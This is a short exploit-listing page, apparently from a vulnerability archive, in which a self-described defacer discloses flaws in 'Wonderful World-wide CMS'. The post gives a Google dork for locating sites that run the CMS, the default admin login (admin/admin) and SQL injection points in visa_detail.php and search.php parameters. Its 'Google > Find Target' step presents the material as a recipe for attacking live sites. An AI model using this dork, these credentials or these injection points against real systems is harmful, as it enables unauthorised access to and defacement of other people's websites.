Wonderful World-Wide CMS SQL Injection / Default Credentials

2014.10.24

Credit: eX-Sh1Ne

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#Title : Wonderful World-wide CMS Multiple Vulnerability
#Author : eX-Sh1Ne
#Facebook : fb..me/ShiNe.gov // fb.com/EksShiNe
#Date : 24/10/2014
#Category : Web Applications
#Type : PHP
#Vendor : n/a
#Download : n/a
#Greetz : Java Defacer Team - Sanjungan Jiwa - All Indonesian Defacer Team
#Thanks : Admin07, pr0blemnymouz, FH04ZA, Black Style, AntonioHsH, Ice-Cream, Tintonz, Freezer22, Basreng, RECOD3D, Adr404Elite, sh0uT0u7, Mr-Avi, Bang Bros / Gayus.
#Tested : Mozila, Chrome-> Windows
#Dork : "Copyright &#169; 2011 Wonderful World-wide All rights reserved." site:
==================================================================
Default Login Admin
Google > Find Target
Go To > http://localhost/admin/
Login with :
Admin : admin
==================================================================
SQL Injection
http://localhost/visa_detail.php?id='2
http://localhost//search.php?country=0&type1=0&type2=1&type3=0)
many more.
==================================================================
Indonesian Defacer here.
// Done.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wonderful World-Wide CMS SQL Injection / Default Credentials

Dork: \"Copyright &#169; 2011 Wonderful World-wide All rights reserved.\" site:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Dork: \"Copyright © 2011 Wonderful World-wide All rights reserved.\" site:

Thanks for you comment!
Your message is in quarantine 48 hours.